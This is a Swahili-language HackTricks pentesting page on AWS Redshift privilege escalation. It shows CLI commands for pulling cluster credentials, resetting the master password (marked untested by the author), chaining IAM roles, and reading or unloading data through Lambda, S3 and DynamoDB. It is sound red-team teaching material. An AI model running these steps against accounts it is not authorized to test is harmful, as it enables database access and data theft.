AWS - Redshift Privesc

Jifunze na kufanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na kufanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mipango ya usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud github repos.

Redshift

Kwa maelezo zaidi kuhusu RDS angalia:

AWS - Redshift Enum

`redshift:DescribeClusters`, `redshift:GetClusterCredentials`

Kwa ruhusa hizi unaweza kupata maelezo ya makundi yote (ikiwa ni pamoja na jina na jina la mtumiaji wa kundi) na kupata hati za kufikia:

# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439

Athari Zinazowezekana: Pata taarifa nyeti ndani ya hifadhidata.

`redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`

Kwa ruhusa hizi unaweza kupata taarifa za makundi yote na kupata vitambulisho vya kuipata. Kumbuka kwamba mtumiaji wa postgres atakuwa na ruhusa ambazo utambulisho wa IAM uliotumika kupata vitambulisho unazo.

# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439

Athari Inayowezekana: Pata taarifa nyeti ndani ya hifadhidata.

`redshift:DescribeClusters`, `redshift:ModifyCluster?`

Inawezekana kubadilisha nenosiri kuu la mtumiaji wa ndani wa postgres (redshift) kutoka aws cli (nadhani haya ndiyo ruhusa unayohitaji lakini bado sijayajaribu):

aws redshift modify-cluster –cluster-identifier <identifier-for-the cluster> –master-user-password ‘master-password’;

Potential Impact: Kupata taarifa nyeti ndani ya hifadhidata.

Accessing External Services

Ili kufikia rasilimali zote zifuatazo, utahitaji kueleza jukumu la kutumia. Redshift cluster inaweza kuwa na orodha ya majukumu ya AWS ambayo unaweza kutumia ikiwa unajua ARN au unaweza kuweka "default" kutumia ile ya kawaida iliyotolewa.

Zaidi ya hayo, kama ilivyoelezwa hapa, Redshift pia inaruhusu kuunganisha majukumu (mradi tu la kwanza linaweza kuchukua la pili) kupata ufikiaji zaidi kwa kutenganisha kwa comma: iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';

Lambdas

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html, inawezekana kuita lambda function kutoka redshift na kitu kama:

CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;

S3

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html, inawezekana kusoma na kuandika kwenye S3 buckets:

# Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

# Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;

Dynamo

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html, inawezekana kupata data kutoka dynamodb:

copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';

Jedwali la Amazon DynamoDB linalotoa data lazima liundwe katika Mkoa wa AWS sawa na klasta yako isipokuwa utumie chaguo la REGION kubainisha Mkoa wa AWS ambapo jedwali la Amazon DynamoDB liko.